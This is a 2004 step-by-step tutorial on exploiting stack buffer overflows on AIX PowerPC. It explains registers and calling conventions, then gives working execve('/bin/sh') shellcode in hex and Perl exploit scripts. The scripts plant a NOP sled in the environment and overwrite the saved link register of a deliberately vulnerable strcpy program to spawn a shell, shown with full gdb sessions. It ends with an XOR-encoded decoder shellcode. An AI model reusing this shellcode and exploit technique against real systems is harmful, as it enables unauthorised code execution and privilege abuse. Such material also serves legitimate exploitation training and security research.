AIX PowerPC buffer overflow step by step
Create:
2004-08-13
Author: san (san_at_xfocus.org)
Chinese version: http://www.xfocus.net/articles/200406/711.html
--[
1 - Familiar with PowerPC architecture(32 bit)
The PowerPC
architecture is a Reduced Instruction Set Computer (RISC) architecture,
with over two hundred defined instructions. PowerPC is RISC in that most
instructions execute in a single cycle and typically perform a single
operation (such as loading storage to a register, or storing a register to
memory). PowerPC instructions are of uniform length of 32 bits and there
are almost 12 instruction formats, which reflect 5 primary classes of
instructions:
- branch instructions,
- fixed-point
instructions,
- floating-point instructions,
- load and store
instructions,
- processor control instructions.
PowerPC's
application-level registers are broken into three classes: general-purpose
registers (GPRs), floating-point registers (FPRs and Floating-Point Status
and Control Register [FPSCR]), and special-purpose registers (SPRs). We
can see 38 registers in gdb with "info registers" command. Following,
Let's look at each
class.
r0 Volatile
register used in function
prologs
r1 Stack frame
pointer
r2 TOC
pointer
r3 Volatile
parameter and return value
register
r4-r10 Volatile registers used for
function parameters
r11 Volatile
register used in calls by pointer and as
an
environment
pointer for languages which require
one
r12 Volatile register used for
exception handling and glink
code
r13 Reserved for use as system
thread ID
r14-r31 Nonvolatile registers used for local
variables
Floating-point registers
(FPRs)
f0 Volatile
scratch register
f1-f4 Volatile floating point
parameter and return value
registers
f5-f13 Volatile floating point
parameter registers
f14-f31 Nonvolatile
registers
Special-purpose registers
(SPRs)
LR Link
register (volatile)
CTR Loop
counter register (volatile)
XER
Fixed point exception register (volatile)
FPSCR
Floating point status and control register
(volatile)
CR0-CR1 Volatile condition code register
fields
CR2-CR4 Nonvolatile condition code register
fields
CR5-CR7 Volatile condition code register
fields
Registers r1, r14 through r31, and f14 through f31 are
nonvolatile, which means that they preserve their values across function
calls. Functions which use those registers must save the value before
changing it, restoring it before the function returns. Register r2 is
technically nonvolatile, but it is handled specially during function calls
as described below: in some cases the calling function must restore its
value after a function call.
Registers r0, r3 through r12, f0
through f13, and the special purpose registers LR, CTR, XER, and FPSCR are
volatile, which means that they are not preserved across function calls.
Furthermore, registers r0, r2, r11, and r12 may be modified by
cross-module calls, so a function can not assume that the values of one of
these registers is that placed there by the calling function.
The
condition code register fields CR0, CR1, CR5, CR6, and CR7 are volatile.
The condition code register fields CR2, CR3, and CR4 are nonvolatile; a
function which modifies them must save and restore at least those fields
of the CR. Languages that require "environment pointers" shall use r11 for
that purpose.
On AIX the svca (sc in a mnemonic notation of
PowerPC) instruction is used whenever the operating system services are to
be called. The r2 register denotes the system call number and registers
r3-r10 are appropriately filled with a given system call arguments. There
are two additional prerequisites that must be fulfilled before executing
the system call instruction: the LR register must be filled with the
return from syscall address value and the crorc cr6, cr6, cr6 instruction
must be issued just before the system call.
--[ 2 - Learn AIX
PowerPC assemble format
Use gcc -S to compile C program can obtain
AIX assembly code. If you are not familiar with AIX PowerPC assemble
format, just write a small program in C language.
/*
setuid.c
*
* Learn AIX PowerPC assembly
*/
#include
<unistd.h>
int
main()
{
setuid(0);
}
Then compile
it use gcc with -S option:
-bash-2.05b$ gcc -S setuid.c
Open
setuid.s on current
directory:
.file
"setuid.c"
.toc
.csect
.text[PR]
.align
2
.globl
main
.globl
.main
.csect
main[DS]
main:
.long
.main, TOC[tc0],
0
.csect
.text[PR]
.main:
.extern
__mulh
.extern
__mull
.extern
__divss
.extern
__divus
.extern
__quoss
.extern
__quous
mflr
0
stw
31,-4(1)
stw
0,8(1)
stwu
1,-72(1)
mr
31,1
li
3,0
bl
.setuid
nop
mr
3,0
lwz
1,0(1)
lwz
0,8(1)
mtlr
0
lwz
31,-4(1)
blr
LT..main:
.long
0
.byte
0,0,32,97,128,1,0,1
.long
LT..main-.main
.short
4
.byte
"main"
.byte
31
.align
2
_section_.text:
.csect
.data[RW],3
.long
_section_.text
To reduce to fundamental parts, the following is
enough:
.globl
.main
.csect
.text[PR]
.main:
mflr
0
stw
31,-4(1)
stw
0,8(1)
stwu
1,-72(1)
mr
31,1
li
3,0
bl
.setuid
nop
mr
3,0
lwz
1,0(1)
lwz
0,8(1)
mtlr
0
lwz
31,-4(1)
blr
--[
3 - Learn shellcode of AIX PowerPC
B-r00t's PowerPC/OS X (Darwin)
Shellcode Assembly is good stuff, although it is OS X but both are PowerPC
architecture. We can write shellcode like B-r00t:
-bash-2.05b$ cat
simple_execve.s
.globl .main
.csect
.text[PR]
.main:
xor. %r5,
%r5, %r5 # r5 =
NULL
bnel .main
# branch to _main if not
equal
mflr %r3
# r3 = main +
8
addi %r3,
%r3, 32 # r3 = main + 8 +
32 =
string
stw
%r3, -8(%r1) # argv[0] =
string
stw
%r5, -4(%r1) # argv[1] =
NULL
subi %r4,
%r1, 8 # r4 = pointer to
argv[]
li %r2,
5 #
syscall number =
execve
crorc
%cr6, %cr6, %cr6 # There are two additional
prerequisites that must be fulfilled before executing the system call
instruction: the LR register must be filled with the return from syscall
address value and the crorc cr6, cr6, cr6 instruction must be issued just
before the system
call.
svca 0
# execve(r3, r4,
r5)
string:
# execve(path, argv[],
NULL)
.asciz "/bin/sh"
-bash-2.05b$
gcc -o simple_execve simple_execve.s
-bash-2.05b$
./simple_execve
$
The execve syscall executed correct, and then
use objdump check the opcode:
-bash-2.05b$ objdump -d
simple_execve|more
...
0000000010000544
<.main>:
10000544: 7c a5 2a
79
xor. r5,r5,r5
10000548:
40 82 ff fd bnel 10000544
<.main>
1000054c: 7c 68 02
a6
mflr r3
10000550:
38 63 00 20 cal
r3,32(r3)
10000554: 90 61 ff
f8
st r3,-8(r1)
10000558:
90 a1 ff fc
st r5,-4(r1)
1000055c:
38 81 ff f8 cal
r4,-8(r1)
10000560: 38 40 00
05 lil
r2,5
10000564: 4c c6 33
42 crorc
6,6,6
10000568: 44 00 00
02
svca 0
1000056c:
2f 62 69 6e
cmpi 6,r2,26990
10000570:
2f 73 68 00
cmpi 6,r19,26624
...
There are some
opcodes contain zero. These bytes must be eliminated for the shellcode to
suit strcpy etc. Some instructions have reservered bytes, so we can
replace it. The opcode of svca is 0x44000002. However, bytes 2 and 3 of
the opcode are reserved and therefore not used. So it can be instead of
0x44ffff02. LSD provided a simple shellcode:
/*
shellcode.c
*
* ripped from lsd
*/
char
shellcode[] = /* 12*4+8
bytes
*/
"\x7c\xa5\x2a\x79"
/*
xor. r5,r5,r5
*/
"\x40\x82\xff\xfd"
/*
bnel <shellcode> */
"\x7f\xe8\x02\xa6"
/*
mflr r31 */
"\x3b\xff\x01\x20"
/* cal
r31,0x120(r31)
*/
"\x38\x7f\xff\x08"
/* cal
r3,-248(r31)
*/
"\x38\x9f\xff\x10"
/* cal
r4,-240(r31)
*/
"\x90\x7f\xff\x10"
/*
st r3,-240(r31)
*/
"\x90\xbf\xff\x14"
/*
st r5,-236(r31)
*/
"\x88\x5f\xff\x0f"
/* lbz
r2,-241(r31)
*/
"\x98\xbf\xff\x0f"
/* stb
r5,-241(r31)
*/
"\x4c\xc6\x33\x42"
/* crorc
cr6,cr6,cr6 */
"\x44\xff\xff\x02"
/*
svca
*/
"/bin/sh"
"\x05"
;
int
main(void)
{
int
jump[2]={(int)shellcode,0};
((*(void
(*)())jump)());
}
After compiled this program, use IDAPro to
open and disassemble it. In IDAPro window, click shellcode at Names window
and press c to disassemble the shellcode
data:
.data:200006D8
shellcode: #
CODE XREF:
.data:200006DC�p
.data:200006D8
# DATA XREF: .data:shellcode_TC�o
.data:200006D8 7C A5 2A
79
xor. r5, r5,
r5 # r5 = NULL
.data:200006DC 40 82
FF
FD
bnel shellcode
# branch to shellcode if not equal
.data:200006E0 7F E8 02
A6
mflr r31
# r31 = .data:200006D8 + 8
.data:200006E4 3B FF 01
20
addi r31, r31, 0x120 # r31 = .data:200006D8 + 8 +
0x120
.data:200006E8 38 7F FF
08
subi r3, r31, 0xF8 # r3 =
.data:200006D8 + 8 + 0x120 - 0xF8 = .data:20000708 =
string
.data:200006EC 38 9F FF
10
subi r4, r31, 0xF0 # r4 =
.data:20000710
.data:200006F0 90 7F FF
10
stw r3, -0xF0(r31) # put address
.data:20000708 to .data:20000710
.data:200006F4 90 BF FF
14
stw r5, -0xEC(r31) # put 0 to
.data:20000714
.data:200006F8 88 5F FF
0F
lbz rtoc, -0xF1(r31)# load syscall number to
r2
.data:200006FC 98 BF FF
0F
stb r5, -0xF1(r31) # put 0 to
.data:2000070F
.data:20000700 4C C6 33
42
crorc 4*cr1+eq, 4*cr1+eq, 4*cr1+eq # Condition Register OR
with
Comlement
.data:20000700
#
------------------------------------------------------------------------
.data:20000704
44 .byte
0x44 # modified svca
.data:20000705
FF .byte
0xFF
.data:20000706
FF .byte
0xFF
.data:20000707
02 .byte 2
.data:20000708
2F .byte
0x2F # /
.data:20000709
62 .byte
0x62 # b
.data:2000070A
69 .byte
0x69 # i
.data:2000070B
6E .byte
0x6E # n
.data:2000070C
2F .byte
0x2F # /
.data:2000070D
73 .byte
0x73 # s
.data:2000070E
68 .byte
0x68 # h
.data:2000070F
05 .byte 5
IDAPro
is more powerful and it's disassembly is more understandability. OK, we
know how to write and debug shellcode now.
--[ 4 - Learn overflow
technology of AIX PowerPC
There are differences of stack structure
between PowerPC and ia32. The PowerPC stack conventions use only a stack
pointer (held in register GPR1) and no frame pointer. This configuration
assumes a fixed stack frame size, which is known at compile time.
Parameters are not passed by pushing them onto the stack. The following is
the PowerPC stack:
. Stack
before
.
. Stack
after .
. calling a
.
. calling a
.
| procedure
|
| procedure
|
+----------------+- +----------------+-
| Parameter area |
|
| Parameter area | |
+----------------+
+-Caller +----------------+
+-Caller
| Linkage
area |
|
| Linkage area | |
SP
--->+----------------+- +----------------+-
| Stack grows
|
| Saved registers| |
. down .
+----------------+ |
. |
.
| Local variables|
|
v
+----------------+
+-Callee
|
Parameter area |
|
+----------------+
|
|
Linkage area |
|
SP
--->+----------------+-
| Stack
grows
|
. down .
. |
.
v
The PowerPC runtime environment uses a grow-down stack that
contains linkage information, local variables, and a routine's parameter
information.
The calling routine's linkage area holds a number of
values, some of which are saved by the calling routine and some by the
called routine. It's structure as
following:
+24+----------------+
| Saved TOC
|
+20+----------------+
| Reserved |
+16+----------------+
| Reserved |
+12+----------------+
| Saved
LR |
+8+----------------+
| Saved
CR |
+4+----------------+
| Saved SP |
SP
--->+----------------+
The Link Register (LR) value is saved at
8(SP) by the called routine if it chooses to do so.
The Condition
Register (CR) value may be saved at 4(SP) by the called routine. As with
the Link Register value, the called routine is not required to save this
value.
The stack pointer is always saved by the calling routine as part
of its stack frame.
The parameter area has space for the parameters
of any routines the caller calls (not the parameters of the caller
itself). Since the calling routine might call several different routines,
the parameter area must be large enough to accommodate the largest
parameter list of all the routines the caller calls. It is the calling
routine's responsibility for setting up the parameter area before each
call to some other routine, and the called routine's responsibility for
accessing the parameters placed within it.
There are three
instructions when function return on ia32:
mov esp,ebp ; esp point
to prior frame
pop
ebp
ret ; execute
address that saved at esp+4
There are some instructions when
function return on AIX PowerPC:
lwz
r1,0(r1) # r1 point to prior
frame
lwz r0,8(r1) #
load saved lr to
r0
mtlr r0 #
lr=r0
lwz r31,-4(r1) #
blr
# execute address that saved at lr
Although there are differences
of stack structure between PowerPC and ia32, but they have the same
overflow technology. We need overwrite ebp+4 of current frame to return
our control address on ia32, and we need overwrite r1+8 of prior frame to
return our control address on AIX PowerPC.
Running the
simple_overflow program in GDB shows that the control of the saved return
address (previous LR value) is possible.
-bash-2.05b$ cat
simple_overflow.c
/* simple_overflow.c
*
* Simple
program to demonstrate buffer overflows
* on the PowerPC
architecture.
*/
#include <stdio.h>
#include
<string.h>
char largebuff[]
=
"123451234512345123451234=PRESERVEDSPACE=ABCD";
int main
(void)
{
char
smallbuff[16];
strcpy (smallbuff,
largebuff);
}
-bash-2.05b$ gcc -o simple_overflow
simple_overflow.c
-bash-2.05b$ gdb -q simple_overflow
(gdb)
r
Starting program: /home/san/simple_overflow
Program received
signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i
reg
r0
0x41424344
1094861636
r1
0x2ff22bb0
804400048
r2
0x20000e70
536874608
r3
0x20
32
r4
0x20000534
536872244
r5
0x2ff22bbc
804400060
r6
0x0 0
r7
0x0 0
r8
0x0 0
r9
0x80808080
-2139062144
r10 0x7f7f7f7f
2139062143
r11 0x4 4
r12 0x80808080
-2139062144
r13 0xdeadbeef
-559038737
r14 0x1 1
r15 0x2ff22c00
804400128
r16 0x2ff22c08
804400136
r17 0x0 0
r18 0xdeadbeef
-559038737
r19 0xdeadbeef
-559038737
r20 0xdeadbeef
-559038737
r21 0xdeadbeef
-559038737
r22 0xdeadbeef
-559038737
r23 0xdeadbeef
-559038737
r24 0xdeadbeef
-559038737
r25 0xdeadbeef
-559038737
r26 0xdeadbeef
-559038737
r27 0xdeadbeef
-559038737
r28 0x20000460
536872032
r29 0x10000000
268435456
r30 0x3 3
r31 0x53455256
1397051990
pc
0x41424344
1094861636
ps
0x4000d032
1073795122
cr
0x22222842
572663874
lr
0x41424344
1094861636
ctr 0x4 4
xer 0x0 0
fpscr 0x0 0
vscr
0x0 0
vrsave
0x0 0
(gdb) x/8x
$r1
0x2ff22bb0:
0x45445350 0x4143453d 0x41424344 0x00000000
0x2ff22bc0:
0x00000000 0x20000e70 0x00000000 0x00000000
Register
pc has been overwritten to ABCD and this is our controled content.
(gdb) disas main
Dump of assembler code for function
main:
0x1000054c
<main+0>: mflr r0
0x10000550
<main+4>: stw
r31,-4(r1)
0x10000554
<main+8>: stw
r0,8(r1)
0x10000558 <main+12>:
stwu r1,-88(r1)
0x1000055c
<main+16>:
mr r31,r1
0x10000560
<main+20>:
addi r3,r31,56
0x10000564
<main+24>: lwz
r4,80(r2)
0x10000568 <main+28>:
bl 0x10006fa0
<strcpy>
0x1000056c <main+32>:
nop
0x10000570 <main+36>:
mr r3,r0
0x10000574
<main+40>: lwz
r1,0(r1)
0x10000578 <main+44>:
lwz r0,8(r1)
0x1000057c
<main+48>: mtlr r0
0x10000580
<main+52>: lwz
r31,-4(r1)
0x10000584 <main+56>: blr
0x10000588
<main+60>: .long 0x0
0x1000058c
<main+64>: .long 0x2061
0x10000590
<main+68>: lwz
r0,1(r1)
0x10000594 <main+72>: .long
0x3c
0x10000598 <main+76>: .long
0x46d61
0x1000059c <main+80>:
xori r14,r11,7936
End of assembler
dump.
(gdb) b main
Breakpoint 1 at 0x10000560
(gdb) r
The
program being debugged has been started already.
Start it from the
beginning? (y or n) y
Starting program:
/home/san/simple_overflow
Breakpoint 1, 0x10000560 in main
()
(gdb) display/i $pc
1: x/i $pc 0x10000560
<main+20>:
addi r3,r31,56
(gdb) x/20x
$r1
0x2ff22b58:
0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78:
0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88:
0x00000000 0xdeadbeef 0xdeadbeef 0xdeadbeef
0x2ff22b98:
0xdeadbeef 0xdeadbeef 0x20000460 0x10000000
(gdb)
0x2ff22ba8:
0x00000003 0x20000460 0x00000000 0x44222802
0x2ff22bb8:
0x100001cc 0x00000000 0x00000000 0x20000e70
0x2ff22bc8:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b58
is the current sp, and it contains prior stack frame address(0x2ff22bb0).
So we can get the lr value that saved in prior stack frame, and it is
0x100001cc. The program will execute this address after main function
return.
(gdb) until *0x1000056c
0x1000056c in main ()
1: x/i
$pc 0x1000056c
<main+32>: nop
(gdb) i
reg
r0
0x20
32
r1
0x2ff22b58
804399960
r2
0x20000e70
536874608
r3
0x2ff22b90
804400016
r4
0x20000534
536872244
r5
0x2ff22bbc
804400060
r6
0x0 0
r7
0x0 0
r8
0x0 0
r9
0x80808080
-2139062144
r10 0x7f7f7f7f
2139062143
r11 0x4 4
r12 0x80808080
-2139062144
r13 0xdeadbeef
-559038737
r14 0x1 1
r15 0x2ff22c00
804400128
r16 0x2ff22c08
804400136
r17 0x0 0
r18 0xdeadbeef
-559038737
r19 0xdeadbeef
-559038737
r20 0xdeadbeef
-559038737
r21 0xdeadbeef
-559038737
r22 0xdeadbeef
-559038737
r23 0xdeadbeef
-559038737
r24 0xdeadbeef
-559038737
r25 0xdeadbeef
-559038737
r26 0xdeadbeef
-559038737
r27 0xdeadbeef
-559038737
r28 0x20000460
536872032
r29 0x10000000
268435456
r30 0x3 3
r31 0x2ff22b58
804399960
pc
0x1000056c
268436844
ps
0x2d032 184370
cr
0x22222842
572663874
lr
0x1000056c
268436844
ctr 0x4 4
xer 0x0 0
fpscr 0x0 0
vscr
0x0 0
vrsave
0x0 0
(gdb) x/20x
$r1
0x2ff22b58:
0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78:
0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88:
0x00000000 0xdeadbeef 0x31323334 0x35313233
0x2ff22b98:
0x34353132 0x33343531 0x32333435 0x31323334
(gdb)
0x2ff22ba8:
0x3d505245 0x53455256 0x45445350 0x4143453d
0x2ff22bb8:
0x41424344 0x00000000 0x00000000 0x20000e70
0x2ff22bc8:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8:
0x00000000 0x00000000 0x00000000 0x00000000
After
strcpy, the lr value that saved in prior stack frame was overwritten to
0x41424344.
(gdb) ni
0x10000570 in main ()
1: x/i
$pc 0x10000570
<main+36>:
mr r3,r0
(gdb)
0x10000574 in main
()
1: x/i $pc 0x10000574
<main+40>:
lwz r1,0(r1)
(gdb)
0x10000578 in main
()
1: x/i $pc 0x10000578
<main+44>:
lwz r0,8(r1)
(gdb)
0x1000057c in main
()
1: x/i $pc 0x1000057c
<main+48>:
mtlr r0
(gdb)
0x10000580 in main ()
1: x/i
$pc 0x10000580
<main+52>:
lwz r31,-4(r1)
(gdb)
0x10000584 in main
()
1: x/i $pc 0x10000584
<main+56>:
blr
(gdb)
Program received signal SIGSEGV, Segmentation
fault.
0x41424344 in ?? ()
1: x/i $pc 0x41424344: Cannot
access memory at address 0x41424344
Disabling display 1 to avoid
infinite recursion.
These instructions has been introduced before.
The program will execute the lr value that saved in prior stack frame at
r1+8.
--[ 5 - How to attack overflow vulnerability on AIX
PowerPC
Now we know overflow process, then let's try to attack
overflow vulnerability. The following program is the
vulnerability.
-bash-2.05b$ cat vulnerable.c
/*
vulnerable.c
*
* Vulnerable program on the PowerPC
architecture.
*/
#include <stdio.h>
#include
<string.h>
int main (int argc, char
*argv[])
{
char
vulnbuff[16];
strcpy (vulnbuff,
argv[1]);
printf ("\n%s\n",
vulnbuff);
getchar(); /* for debug
*/
}
-bash-2.05b$ gcc -o vulnerable
vulnerable.c
0x2ff22fff seems to be stack bottom of AIX. The
following is the AIX's stack
structure:
Stack bottom
+----------------+
0x2ff22fff
| Reserverd
|
+----------------+
| Enviroment |
+----------------+
| args |
+----------------+
| path |
+----------------+
| Stack frames |
SP
--->+----------------+
| Stack grows
|
. down .
. |
.
. v
.
Enviroment address can be guessed more exactly, so we put lots of
nop instructions and the shellcode into the
enviroment.
-bash-2.05b$ cat
exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program
vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79".
# /*
xor. r5,r5,r5
*/
"\x40\x82\xff\xfd".
# /*
bnel <shellcode> */
"\x7f\xe8\x02\xa6".
# /*
mflr r31 */
"\x3b\xff\x01\x20".
# /* cal
r31,0x120(r31)
*/
"\x38\x7f\xff\x08".
# /* cal
r3,-248(r31)
*/
"\x38\x9f\xff\x10".
# /* cal
r4,-240(r31)
*/
"\x90\x7f\xff\x10".
# /*
st r3,-240(r31)
*/
"\x90\xbf\xff\x14".
# /*
st r5,-236(r31)
*/
"\x88\x5f\xff\x0f".
# /* lbz
r2,-241(r31)
*/
"\x98\xbf\xff\x0f".
# /* stb
r5,-241(r31)
*/
"\x4c\xc6\x33\x42".
# /* crorc
cr6,cr6,cr6 */
"\x44\xff\xff\x02".
# /*
svca
*/
"/bin/sh".
"\x05";
$NOP="\x60\x60\x60\x60"x800;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system
$CMD ,"\x2f\xf2\x2b\x40"x11;
Try it.
-bash-2.05b$
./exploit.pl
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
Use gdb
debug the vulnerable program on the another tty:
-bash-2.05b$ ps
aux|grep
vul
san 47644 0.0 0.0 208 220 pts/1
A 22:16:24 0:00 grep
vul
san 44544 0.0 0.0
96 304 pts/0
A 22:16:02 0:00
/home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb
6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free
software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is
absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as
"powerpc-ibm-aix5.1.0.0"...
Attaching to program: /home/san/vulnerable,
process 44544
0xd01ea254 in read () from
/usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for
function main:
0x10000544
<main+0>: mflr r0
0x10000548
<main+4>: stw
r31,-4(r1)
0x1000054c
<main+8>: stw
r0,8(r1)
0x10000550 <main+12>:
stwu r1,-88(r1)
0x10000554
<main+16>:
mr r31,r1
0x10000558
<main+20>: stw
r3,112(r31)
0x1000055c <main+24>:
stw r4,116(r31)
0x10000560
<main+28>: lwz
r9,116(r31)
0x10000564 <main+32>:
addi r9,r9,4
0x10000568
<main+36>:
addi r3,r31,56
0x1000056c
<main+40>: lwz
r4,0(r9)
0x10000570 <main+44>:
bl 0x10007000
<strcpy>
0x10000574 <main+48>:
nop
0x10000578 <main+52>: lwz
r3,88(r2)
0x1000057c <main+56>:
addi r4,r31,56
0x10000580
<main+60>:
bl 0x100073ec
<printf>
0x10000584 <main+64>:
lwz r2,20(r1)
0x10000588
<main+68>: lwz
r11,92(r2)
0x1000058c <main+72>:
lwz r9,92(r2)
0x10000590
<main+76>: lwz
r9,4(r9)
0x10000594 <main+80>:
addi r0,r9,-1
0x10000598
<main+84>: stw
r0,4(r11)
0x1000059c <main+88>: cmpwi
r0,0
0x100005a0 <main+92>:
bge- 0x100005b4 <main+112>
0x100005a4
<main+96>: lwz
r3,92(r2)
0x100005a8
<main+100>: bl 0x1000747c
<__filbuf>
0x100005ac
<main+104>: lwz
r2,20(r1)
0x100005b0
<main+108>: b
0x100005c8 <main+132>
0x100005b4
<main+112>: lwz
r11,92(r2)
0x100005b8
<main+116>: lwz
r9,92(r2)
0x100005bc
<main+120>: lwz
r9,0(r9)
0x100005c0
<main+124>: addi r0,r9,1
0x100005c4
<main+128>: stw
r0,0(r11)
0x100005c8
<main+132>: mr r3,r0
0x100005cc
<main+136>: lwz
r1,0(r1)
0x100005d0
<main+140>: lwz
r0,8(r1)
0x100005d4
<main+144>: mtlr r0
0x100005d8
<main+148>: lwz
r31,-4(r1)
0x100005dc <main+152>: blr
0x100005e0
<main+156>: .long 0x0
0x100005e4
<main+160>: .long 0x2061
0x100005e8
<main+164>: lwz
r0,513(r1)
---Type <return> to continue, or q <return> to
quit---
0x100005ec <main+168>: .long 0x0
0x100005f0
<main+172>: .long 0x9c
0x100005f4
<main+176>: .long 0x46d61
0x100005f8
<main+180>: xori r14,r11,7936
End
of assembler dump.
(gdb) b *0x100005dc
Breakpoint 1 at
0x100005dc
(gdb) c
Continuing.
Press any key at the tty which
running exploit.pl, and the gdb debug window continues:
Breakpoint
1, 0x100005dc in main ()
(gdb) i
reg
r0
0x100001cc
268435916
r1
0x2ff22210
804397584
r2
0x20000ee8
536874728
r3
0xf00890f1
-267874063
r4
0xf00890f0
-267874064
r5
0x0 0
r6
0xd032
53298
r7
0x0 0
r8
0x60000000
1610612736
r9
0x60002449
1610622025
r10 0x0 0
r11 0x600026c8
1610622664
r12 0x100005ac
268436908
r13 0xdeadbeef
-559038737
r14 0x2 2
r15 0x2ff22264
804397668
r16 0x2ff22270
804397680
r17 0x0 0
r18 0xdeadbeef
-559038737
r19 0xdeadbeef
-559038737
r20 0xdeadbeef
-559038737
r21 0xdeadbeef
-559038737
r22 0xdeadbeef
-559038737
r23 0xdeadbeef
-559038737
r24 0xdeadbeef
-559038737
r25 0xdeadbeef
-559038737
r26 0xdeadbeef
-559038737
r27 0xdeadbeef
-559038737
r28 0x20000520
536872224
r29 0x10000000
268435456
r30 0x3 3
r31 0x2ff22b40
804399936
pc
0x100005dc
268436956
ps
0x2d032 184370
cnd 0x24222422
606217250
lr
0x100001cc
268435916
cnt 0x0 0
xer 0x0 0
mq
0x0 0
fpscr 0x0 0
(gdb)
x/20x $r1
(gdb) x/20x $r1
0x2ff22210:
0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220:
0x00000000 0x20000ee8 0x00000002 0x2ff2225c
0x2ff22230:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22240:
0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22250:
0x00000000 0x00000000 0x00000000 0x2ff22270
(gdb)
x/20x 0x2ff22b40
0x2ff22b40:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b60:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b70:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b80:
0x60606060 0x60606060 0x60606060 0x60606060
...
...
...
(gdb)
0x2ff22f00:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f10:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20:
0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30:
0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
0x2ff22f40:
0x02a63bff 0x0120387f 0xff08389f 0xff10907f
The
lr register has been overwritten to 0x2ff22b40. Program will execute this
address after function returning, and there are lots of nop instructions
after this address until the shellcode appeared. But we must be notice the
align problem. The following exploit avoid this
problem:
#!/usr/bin/perl
#
# exploit1.pl
# exploit program
vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79".
# /*
xor. r5,r5,r5
*/
"\x40\x82\xff\xfd".
# /*
bnel <shellcode> */
"\x7f\xe8\x02\xa6".
# /*
mflr r31 */
"\x3b\xff\x01\x20".
# /* cal
r31,0x120(r31)
*/
"\x38\x7f\xff\x08".
# /* cal
r3,-248(r31)
*/
"\x38\x9f\xff\x10".
# /* cal
r4,-240(r31)
*/
"\x90\x7f\xff\x10".
# /*
st r3,-240(r31)
*/
"\x90\xbf\xff\x14".
# /*
st r5,-236(r31)
*/
"\x88\x5f\xff\x0f".
# /* lbz
r2,-241(r31)
*/
"\x98\xbf\xff\x0f".
# /* stb
r5,-241(r31)
*/
"\x4c\xc6\x33\x42".
# /* crorc
cr6,cr6,cr6 */
"\x44\xff\xff\x02".
# /*
svca
*/
"/bin/sh".
"\x05";
$NOP="\x60\x60\x60\x60"x800;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system
$CMD ,"\x2f\xf2\x2b\x40"x11;
for($i=0;$i<4 &&
$ret;$i++){
for($j=0;$j<4 &&
$ret;$j++)
{
$ENV{CCC}="A"x $j
.$NOP.$SHELLCODE;
$ret
= system $CMD ,"A"x $i
."\x2f\xf2\x2b\x40"x11;
}
}
-bash-2.05b$
./exploit1.pl
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
$
It
seems good!
--[ 6 - Bypass I-cache
Decoder shellcode is very
simple in ia32 architechture. Although PowerPC instructions cann't access
memory direct except load and store instructions, but we can write a
decoder shellcode as ia32.
char shellcode[] =
//
decoder
"\x7c\xa5\x2a\x79" // xor. %r5,
%r5,
%r5
"\x40\x82\xff\xfd" // bnel .main
"\x7c\x68\x02\xa6" // mflr %r3
"\x38\x63\x01\x01" // addi %r3,
%r3,
0x101
"\x38\x63\xff\x26" // addi %r3,
%r3, -0xDA # r3 point start of real
shellcode-1
"\x39\x20\x01\x01" // li %r9,
0x101
"\x39\x29\xff\x23" // addi %r9,
%r9, -0xDD # shellcode
size+1
"\x7c\xc9\x18\xae" // lbzx %r6,
%r9, %r3 # read a
character
"\x68\xc7\xfe\xfe" // xori %r7,
%r6, 0xFEFE #
xor
"\x7c\xe9\x19\xae" // stbx %r7,
%r9, %r3 # store a
character
"\x35\x29\xff\xff" // subic. %r9,
%r9,
1
"\x40\x82\xff\xf0" // bne
Loop #
loop
// real
shellcode
"\xc6\x9d\xfe\xe3" // addi %r3,
%r3,
29
"\x6e\x9f\x01\x06" // stw
%r3,
-8(%r1)
"\x6e\x5f\x01\x02" // stw
%r5,
-4(%r1)
"\xc6\x7f\x01\x06" // subi %r4,
%r1,
8
"\xc6\xbe\xfe\xfb" // li %r2,
5
"\xb2\x38\xcd\xbc" // crorc
%cr6, %cr6,
%cr6
"\xba\xfe\xfe\xfc" // svca 0
"\xd1\x9c\x97\x90" // .byte
'/', 'b', 'i',
'n',
"\xd1\x8d\x96\xfe" // '/',
's', 'h', 0x0
;
int main() {
int
jump[2]={(int)shellcode,0};
((*(void
(*)())jump)());
}
The first part is decoder. r3 points to the
address of the front of real shellcode. r9 is the counter, whose size is
one more than real shellcode. It will do xor operate from last byte of
real shellcode.
